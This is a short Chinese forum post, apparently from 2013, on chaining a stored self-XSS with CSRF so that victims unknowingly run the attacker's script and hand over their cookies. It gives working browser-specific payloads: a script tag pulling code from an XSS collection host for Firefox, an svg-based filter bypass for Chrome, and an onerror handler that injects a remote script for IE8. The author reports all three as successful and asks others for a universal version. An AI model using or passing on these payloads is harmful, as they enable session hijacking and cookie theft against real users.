存储型xss自己x自己的xss各个浏览器的用法

小胖胖要减肥 | 2013-01-03 23:15

很多时候我们会碰到一些xss,自己编辑的时候没有过滤,但保存以后过滤了,点击编辑又会触发,这个时候会感觉很鸡肋对不对。

这个时候就会想能不能csrf去触发修改,这样受害者不是能够自己x自己了,我们也能收到想要了cookies了,基于这个想法只要找一些鸡肋的xss和没有做csrf的地方

1.firefox下基本没有任何对csrf+xss的防御,用户只要点击你的网址直接用

"><script src=http://xsser.me/*****></script>

就可以了

2.chrome下就要用到一个chrome的0day,sogili大牛提供的

"><svg><script xlink:href=//********></script> chrome的bypass

3.ie8,对于ie8来说过滤器还是满强大的,但二哥之前发过一个0day

WooYun: IE8 xss filter bypass (xss过滤器绕过)

再结合群里童鞋提供的

onerror="with(document)body.appendChild(createElement('script')).src='//test.com/js.js'"

这个方法来触发接收cookies就可以了

以上三个案例都已经能够尝试能够成功获取到cookies,正好把那些鸡肋的cookies和无危害的csrf利用起来

上面的方法对反射型的xss应该也都是有作用的,不过缺点在于不能通杀,不知道大牛们能不能搞出通杀的